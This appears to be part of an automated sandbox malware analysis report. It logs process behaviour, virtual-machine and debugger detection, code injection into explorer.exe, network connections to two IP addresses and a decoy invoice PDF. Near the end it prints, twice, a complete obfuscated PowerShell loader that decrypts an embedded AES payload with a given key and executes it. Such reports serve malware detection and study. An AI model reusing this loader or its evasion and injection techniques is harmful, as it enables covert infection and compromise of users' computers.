                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\putty.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
                  Source: C:\Users\user\AppData\Roaming\putty.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuAPI/Special instruction interceptor: Address: 7FF8C88EE814
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuAPI/Special instruction interceptor: Address: 7FF8C88ED584
                  Source: putty.exe, 00000006.00000002.2239372795.00000000006EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                  Source: ddhfdfu, 0000000D.00000002.2474143037.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4440Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5420Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 542Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1307Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 708Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 362Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 351Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3397Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 557Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7200Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5280Thread sleep count: 542 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7532Thread sleep count: 1307 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7532Thread sleep time: -130700s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 7528Thread sleep count: 708 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7528Thread sleep time: -70800s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 8044Thread sleep count: 324 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 8044Thread sleep time: -32400s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 4816Thread sleep count: 362 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 5244Thread sleep count: 351 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 5244Thread sleep time: -35100s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 7532Thread sleep count: 3397 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7532Thread sleep time: -339700s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: explorer.exe, 0000000C.00000000.2208689710.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 0000000C.00000000.2206796100.0000000003592000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: svchost.exe, 00000007.00000002.3330599807.00000178B6A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: explorer.exe, 0000000C.00000000.2205441339.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                  Source: explorer.exe, 0000000C.00000000.2206796100.0000000003592000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                  Source: explorer.exe, 0000000C.00000000.2208689710.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                  Source: powershell.exe, 00000002.00000002.2126821002.000001DD00030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3332400159.00000178BC058000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2215211118.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: explorer.exe, 0000000C.00000000.2206796100.0000000003592000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                  Source: explorer.exe, 0000000C.00000000.2206796100.0000000003592000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                  Source: explorer.exe, 0000000C.00000000.2205441339.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 0000000C.00000000.2208689710.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\AppData\Roaming\putty.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\AppData\Roaming\putty.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuSystem information queried: CodeIntegrityInformation
                  Source: C:\Users\user\AppData\Roaming\putty.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00561694 push dword ptr fs:[00000030h]6_2_00561694
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_006D092B mov eax, dword ptr fs:[00000030h]6_2_006D092B
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_006D0D90 mov eax, dword ptr fs:[00000030h]6_2_006D0D90
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00551694 push dword ptr fs:[00000030h]13_2_00551694
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_0061092B mov eax, dword ptr fs:[00000030h]13_2_0061092B
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00610D90 mov eax, dword ptr fs:[00000030h]13_2_00610D90

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\explorer.exeFile created: ddhfdfu.12.drJump to dropped file
                  Source: C:\Windows\explorer.exeNetwork Connect: 109.70.26.37 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 94.156.177.51 80Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\putty.exeThread created: C:\Windows\explorer.exe EIP: 10F1998Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuThread created: unknown EIP: 1211998
                  Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3)Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\invoce2.pdf"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function wfmpf($mmid){return -split ($mmid -replace '..', '0x$& ')};$ralma = wfmpf('6ddd913a204eda9b48cf5583720fa53b3c5cdee6e974b7bf173341d66880a83528e76a5a809eda47d2c263e95e00a51ae2a33d069542ccae0c0fef761523c7afe37b64185c653b4c4bf39e67e1d89cd6636984fc646c493c76294187d1b2b75d79dbaab680164b0c94848aa09bf281c313b7c3c2532160823efecf40af7a9240375a29dd3d82c002b29486566c166f6f04711f20f7f5b2b6cdc61aa7908a19fe7de86886141f7a340433f1a7d86ed97fa28c2ac93960b814156d48d922f4b029c07206c1aef6b44ff7af133921b3db8f2ff073f4cffa862edb9214ce28c296d8fb5162d5ab69b39935125ab3242b742a33d4141147fcf532eeb49a69fea321ace3e5bffdc1520fb98a143bbafd22bb525550d37d463f288c61a14b1258687eb239e9a260d0e160d9614f09967fe97f9b2ce6be1c24011e78caab16ceea4345678eab2756d340ea7c849f355578cb519aa0de8625f493eadbd13583073be0d247ebd15cd925fe851855979d18651080cf3bd6fb803715b373c134f7d1ea1e3fab7e02d0d4ad6fc40ead36c911a1ae73d421ac10efe01473747c3b4fc05fd6d4d08c3521db6ba6e9eef6cb8b1c7fc76884c910c22860e3575831c23a88693a6d7fe1f158e001ed75b4588c08ed639a5b3f223e76cf1c17495201f16d4149f714ca4bd42d2d5e17399cf5e4fcae83c94e9dba2089f3c430ce2585999674221ce62e61dcb128072e936b5dfed4cebeeba9232e582c33488e026e0f5123211b5e9b12b46c0ca95d1f9a903b6b2310cb4e108c5c9b8328e9021e1b76eae56ef681bbc20e3c74bccaa8e25decf9c13896d1252b4b86b2315f62ecc43fdd7f9d446c70e046c7872722c69950ac7a26563c81c0a52f3b0f0d43d41fe0060d34820472ae9a9818d2fd3b117a4b0084eaa21d1666a9297dcaeacadd63462fbb1e22c56869537ca0c0e1cd52eabff12858bc9b1dddc8cb4c70e9fa2549b5144f447d1defc94f5830d9cac04660b19c385ec1a3d989ac7bad8c3e7e908c697c4da249d156475901b73f3c800c602e586aa6998c17eb947e3d2e8a13e7292546210af7eb29b003da7407af81f5b7811619b414e06d1d724ef79fe960509f6d85f4b55a5b6a365f6ee49825f0b19433ea2c64737468f1faa1dda90e230f23cb6751052459789fac25ab27097516e251b4c56d5b1497389f33f64f9c729fadb9f635e6771d884ffad2363c3d29d49812042636e0b8aaee30');$idrjo=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((wfmpf('4f6c6d774c5361495051654d7258624f')),[byte[]]::new(16)).transformfinalblock($ralma,0,$ralma.length)); & $idrjo.substring(0,3) $idrjo.substring(3)
